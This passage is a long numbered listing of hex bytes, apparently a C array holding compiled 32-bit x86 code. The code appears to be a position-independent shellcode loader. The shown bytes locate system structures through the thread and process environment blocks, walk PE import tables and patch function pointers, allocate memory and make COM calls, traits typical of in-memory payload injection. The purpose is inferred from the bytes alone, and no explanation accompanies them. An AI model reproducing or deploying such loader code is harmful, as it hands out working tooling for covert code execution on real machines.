1156 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x80, 0x0c, 0x04, 0x00, 0x00,
1157 0x84, 0xc0, 0x74, 0x37, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00,
1158 0x00, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89,
1159 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xd1, 0xd3,
1160 0xff, 0xff, 0x8d, 0x85, 0x3e, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04,
1161 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8b,
1162 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
1163 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28,
1164 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00,
1165 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c,
1166 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00,
1167 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x70, 0xff,
1168 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xff, 0xff,
1169 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1170 0x24, 0x04, 0xff, 0xff, 0x1f, 0x00, 0x8d, 0x85, 0x40, 0xfe, 0xff, 0xff,
1171 0x89, 0x04, 0x24, 0xe8, 0x30, 0x24, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83,
1172 0x7d, 0x90, 0x00, 0x78, 0x69, 0x8b, 0x85, 0x40, 0xfe, 0xff, 0xff, 0x8b,
1173 0x55, 0xb4, 0x89, 0x54, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1174 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04,
1175 0x24, 0xe8, 0x45, 0x23, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90,
1176 0x00, 0x79, 0x3b, 0xe9, 0xee, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x44, 0xff,
1177 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x44, 0xff, 0xff, 0xff,
1178 0x64, 0x8b, 0x00, 0x89, 0x85, 0x40, 0xff, 0xff, 0xff, 0x8b, 0x85, 0x40,
1179 0xff, 0xff, 0xff, 0x8b, 0x40, 0x30, 0x89, 0x04, 0x24, 0x8b, 0x85, 0x70,
1180 0xff, 0xff, 0xff, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xeb, 0x04, 0x90, 0xeb,
1181 0x01, 0x90, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1182 0xaa, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x00, 0x00,
1183 0x00, 0x00, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1184 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x89,
1185 0x44, 0x24, 0x08, 0x8d, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24,
1186 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x26, 0x23, 0x00,
1187 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x64, 0x8b, 0x85,
1188 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24, 0x08, 0x89,
1189 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x40,
1190 0x22, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x78, 0x41,
1191 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
1192 0x04, 0x89, 0x04, 0x24, 0xe8, 0x5b, 0x22, 0x00, 0x00, 0xeb, 0x2b, 0x90,
1193 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90, 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90,
1194 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90, 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90,
1195 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90,
1196 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f,
1197 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0xa8, 0x00, 0x00, 0x00, 0x8b,
1198 0x45, 0x08, 0x05, 0x44, 0x04, 0x00, 0x00, 0x89, 0x45, 0xf4, 0xc7, 0x45,
1199 0xf0, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xf0, 0x8b, 0x45,
1200 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x70, 0xff, 0xff, 0xff,
1201 0x8b, 0x55, 0xf0, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xf0, 0x01, 0x8b,
1202 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1203 0x74, 0x15, 0x8b, 0x55, 0xf0, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1204 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf0, 0x7f, 0x7e, 0xc0, 0x83,
1205 0x7d, 0xf0, 0x00, 0x74, 0x37, 0x8b, 0x45, 0xf0, 0x83, 0xc0, 0x01, 0x01,
1206 0x45, 0xf4, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf0, 0x01,
1207 0xd0, 0xc6, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8d,
1208 0x85, 0x70, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xe3, 0x1c, 0x00,
1209 0x00, 0x85, 0xc0, 0x75, 0x81, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x06,
1210 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83,
1211 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1212 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x0c, 0x00,
1213 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x71, 0x8b, 0x45, 0xf4,
1214 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00,
1215 0xc7, 0x44, 0x24, 0x10, 0x1c, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89,
1216 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b,
1217 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff,
1218 0xff, 0xe8, 0xe3, 0x21, 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0,
1219 0x00, 0x79, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45,
1220 0xe4, 0x3d, 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xec, 0x3d,
1221 0x00, 0x00, 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe8, 0x83, 0xf8, 0x04,
1222 0x75, 0x07, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00,
1223 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec, 0x08, 0x01, 0x00,
1224 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0x94, 0x18,
1225 0x00, 0x00, 0x00, 0x8b, 0x45, 0x94, 0x64, 0x8b, 0x00, 0x89, 0x45, 0x90,
1226 0x8b, 0x45, 0x90, 0x8b, 0x40, 0x30, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0xc8,
1227 0x8b, 0x40, 0x10, 0x89, 0x45, 0xc4, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38,
1228 0x8b, 0x55, 0x08, 0x81, 0xc2, 0x1c, 0x03, 0x00, 0x00, 0x89, 0x14, 0x24,
1229 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xc0, 0x8b, 0x45, 0xc0, 0x89,
1230 0x45, 0xbc, 0x8b, 0x45, 0xbc, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1231 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xb8, 0x8b, 0x45, 0xb8, 0x8d, 0x50, 0x18,
1232 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x01, 0xd0,
1233 0x89, 0x45, 0xb4, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66,
1234 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1235 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45,
1236 0x08, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x3e,
1237 0x8b, 0x55, 0xf4, 0x89, 0xd0, 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0,
1238 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xb4, 0x01, 0xd0, 0x8b, 0x50, 0x0c, 0x8b,
1239 0x45, 0xc0, 0x01, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x55, 0xf4, 0x89, 0xd0,
1240 0xc1, 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45,
1241 0xb4, 0x01, 0xd0, 0x8b, 0x40, 0x08, 0xc1, 0xe8, 0x02, 0x89, 0x45, 0xf0,
1242 0xeb, 0x13, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xb8, 0x0f, 0xb7, 0x40,
1243 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45, 0xf4, 0x72, 0x8b, 0x8b, 0x45, 0x08,
1244 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x89, 0x45, 0xb0, 0xc7, 0x45, 0xf4, 0x00,
1245 0x00, 0x00, 0x00, 0xeb, 0x3f, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00,
1246 0x00, 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x89, 0x45, 0xe8, 0x8b,
1247 0x45, 0xe8, 0x8b, 0x40, 0x04, 0x39, 0x45, 0xb0, 0x75, 0x1d, 0x8b, 0x45,
1248 0x08, 0x8b, 0x80, 0xfc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x0c, 0x89, 0x54,
1249 0x24, 0x04, 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1250 0x08, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b,
1251 0x45, 0xf0, 0x72, 0xb9, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x64, 0xff, 0xd0,
1252 0x89, 0x45, 0xac, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x6d,
1253 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1254 0xec, 0x01, 0xd0, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x04,
1255 0x39, 0x45, 0xac, 0x75, 0x4b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xec, 0x00,
1256 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x55,
1257 0xe8, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x55, 0x88, 0x89, 0x14, 0x24, 0xff,
1258 0xd0, 0x83, 0xec, 0x0c, 0x8b, 0x45, 0xf4, 0x8d, 0x14, 0x85, 0x00, 0x00,
1259 0x00, 0x00, 0x8b, 0x45, 0xec, 0x01, 0xc2, 0xc7, 0x44, 0x24, 0x08, 0x08,
1260 0x00, 0x00, 0x00, 0x8d, 0x45, 0x88, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1261 0x24, 0xe8, 0x50, 0x19, 0x00, 0x00, 0xeb, 0x0d, 0x90, 0x83, 0x45, 0xf4,
1262 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xf0, 0x72, 0x8b, 0x8b, 0x45, 0xc8,
1263 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xa4, 0x8b, 0x45, 0xa4, 0x8b, 0x40, 0x0c,
1264 0x89, 0x45, 0xe4, 0xe9, 0x95, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05,
1265 0x44, 0x03, 0x00, 0x00, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xd0, 0x01, 0x00,
1266 0x00, 0x00, 0xc7, 0x45, 0xd4, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
1267 0x00, 0x00, 0x00, 0x00, 0xeb, 0x48, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1268 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x07, 0xc7, 0x45, 0xd0,
1269 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1270 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x07, 0xc7, 0x45, 0xd4, 0x01, 0x00,
1271 0x00, 0x00, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6,
1272 0x00, 0x8d, 0x8d, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x55, 0xf4, 0x01, 0xca,
1273 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf4,
1274 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x15, 0x8b, 0x55, 0xd8,
1275 0x8b, 0x45, 0xf4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x06,
1276 0x83, 0x7d, 0xf4, 0x7f, 0x76, 0x94, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84,
1277 0xf4, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x83, 0xc0, 0x01, 0x01, 0x45,
1278 0xd8, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0x01, 0xd0,
1279 0xc6, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0xc7, 0x44, 0x24,
1280 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x08, 0xff, 0xff, 0xff, 0x89,
1281 0x54, 0x24, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
1282 0x24, 0xe8, 0x29, 0xcf, 0xff, 0xff, 0x89, 0x45, 0xa0, 0x83, 0x7d, 0xa0,
1283 0x00, 0x0f, 0x84, 0xa3, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xd0, 0x00, 0x74,
1284 0x4d, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xd4, 0x00, 0x74,
1285 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x98, 0x8b, 0x45, 0x98, 0xff, 0xd0,
1286 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00, 0x0f, 0x84, 0xfe, 0xfe, 0xff,
1287 0xff, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
1288 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1289 0x84, 0xe2, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0x8c, 0x8b, 0x45, 0xe0, 0x89,
1290 0x10, 0xe9, 0xd5, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0xdc,
1291 0x83, 0x7d, 0xd4, 0x00, 0x74, 0x0e, 0x8b, 0x45, 0xa0, 0x89, 0x45, 0x9c,
1292 0x8b, 0x45, 0x9c, 0xff, 0xd0, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00,
1293 0x0f, 0x84, 0xb1, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x00, 0x89,
1294 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x0a, 0xfc,
1295 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x95, 0xfe, 0xff, 0xff, 0x8b, 0x45,
1296 0xe8, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xdc, 0x89, 0x10, 0xe9, 0x85, 0xfe,
1297 0xff, 0xff, 0x90, 0xe9, 0x7f, 0xfe, 0xff, 0xff, 0x90, 0x8b, 0x45, 0xe4,
1298 0x8b, 0x00, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x8b, 0x40, 0x18, 0x85,
1299 0xc0, 0x0f, 0x85, 0x5d, 0xfe, 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00,
1300 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x81, 0xec, 0x44, 0x03, 0x00, 0x00,
1301 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
1302 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c,
1303 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01,
1304 0x83, 0xd2, 0x00, 0x01, 0xc0, 0x89, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x8b,
1305 0x45, 0xf4, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14, 0x04, 0x00,
1306 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00, 0x00, 0x8d, 0x85,
1307 0xec, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
1308 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44,
1309 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x46, 0x1d,
1310 0x00, 0x00, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0x3d,
1311 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0x8b, 0x55, 0x0c,
1312 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x89, 0xd3, 0x8b, 0x95,
1313 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x4d, 0x0c, 0x81, 0xc1, 0x28, 0x05, 0x00,
1314 0x00, 0x89, 0x5c, 0x24, 0x14, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44, 0x24,
1315 0x0c, 0xff, 0xff, 0xff, 0xff, 0x89, 0x4c, 0x24, 0x08, 0xc7, 0x44, 0x24,
1316 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00,
1317 0xff, 0xd0, 0x83, 0xec, 0x18, 0x8d, 0x45, 0x84, 0x89, 0x45, 0xb0, 0x8d,
1318 0x45, 0xb0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1319 0xe8, 0xe1, 0x02, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x89,
1320 0x45, 0xb8, 0x8d, 0x45, 0xb0, 0x83, 0xc0, 0x08, 0x89, 0x44, 0x24, 0x04,
1321 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0x06, 0x00, 0x00, 0x8d,
1322 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xc4, 0x8d, 0x45, 0xb0, 0x83,
1323 0xc0, 0x14, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
1324 0xe8, 0x43, 0x08, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xd8, 0x00,
1325 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
1326 0x24, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45,
1327 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x07, 0x02, 0x00, 0x00, 0x8b,
1328 0x45, 0x08, 0x8b, 0x80, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d,
1329 0x9a, 0xa4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x84, 0x08,
1330 0x00, 0x00, 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x5c, 0x24,
1331 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x03, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1332 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x0c, 0x24, 0xff, 0xd0, 0x83, 0xec,
1333 0x14, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0xbc, 0x01,
1334 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x55, 0x08,
1335 0x8d, 0x9a, 0xd4, 0x08, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xe4,
1336 0x89, 0x4c, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff,
1337 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1338 0x85, 0x63, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1339 0x0c, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1340 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x30, 0x01, 0x00,
1341 0x00, 0x8b, 0x45, 0xe0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1342 0x8b, 0x40, 0x0c, 0x8b, 0x55, 0xe0, 0x8d, 0x4d, 0xb0, 0x89, 0x4c, 0x24,
1343 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xec,
1344 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x85, 0x03, 0x01, 0x00, 0x00, 0x8b, 0x45,
1345 0x08, 0x8d, 0x90, 0xe5, 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfc, 0xff,
1346 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08,
1347 0x89, 0x04, 0x24, 0xe8, 0x07, 0xcb, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
1348 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95, 0xf2, 0xfc, 0xff, 0xff, 0x89,
1349 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x8b, 0x45,
1350 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x20, 0x8b, 0x55, 0xe0, 0xc7, 0x44, 0x24,
1351 0x08, 0x02, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c, 0x24, 0x04,
1352 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xec, 0x8b,
1353 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe8, 0x89,
1354 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x83, 0x7d, 0xec, 0x00, 0x0f,
1355 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1356 0x14, 0x8b, 0x8d, 0xf4, 0xfe, 0xff, 0xff, 0x8b, 0x55, 0xe4, 0xc7, 0x44,
1357 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
1358 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1359 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14, 0x00, 0x00,
1360 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44,
1361 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
1362 0x00, 0x00, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1363 0xec, 0x28, 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x1e, 0x8b,
1364 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x14, 0x8b, 0x55, 0xe0, 0xc7, 0x44,
1365 0x24, 0x04, 0x02, 0x00, 0x00, 0x00, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1366 0xec, 0x08, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x8b, 0x40,
1367 0x08, 0x8b, 0x55, 0xe4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
1368 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x8b, 0x40, 0x1c, 0x8b, 0x55, 0xe0, 0x89,
1369 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
1370 0x8b, 0x40, 0x08, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1371 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b,
1372 0x80, 0x28, 0x0d, 0x00, 0x00, 0x83, 0xc0, 0x01, 0x83, 0xd2, 0x00, 0x8d,
1373 0x14, 0x00, 0x8b, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08,
1374 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
1375 0xcc, 0x13, 0x00, 0x00, 0xc7, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x00, 0x00,
1376 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
1377 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0xec, 0xfc, 0xff, 0xff, 0x89,
1378 0x44, 0x24, 0x08, 0x8d, 0x85, 0xf4, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24,
1379 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x1a, 0x1a, 0x00,
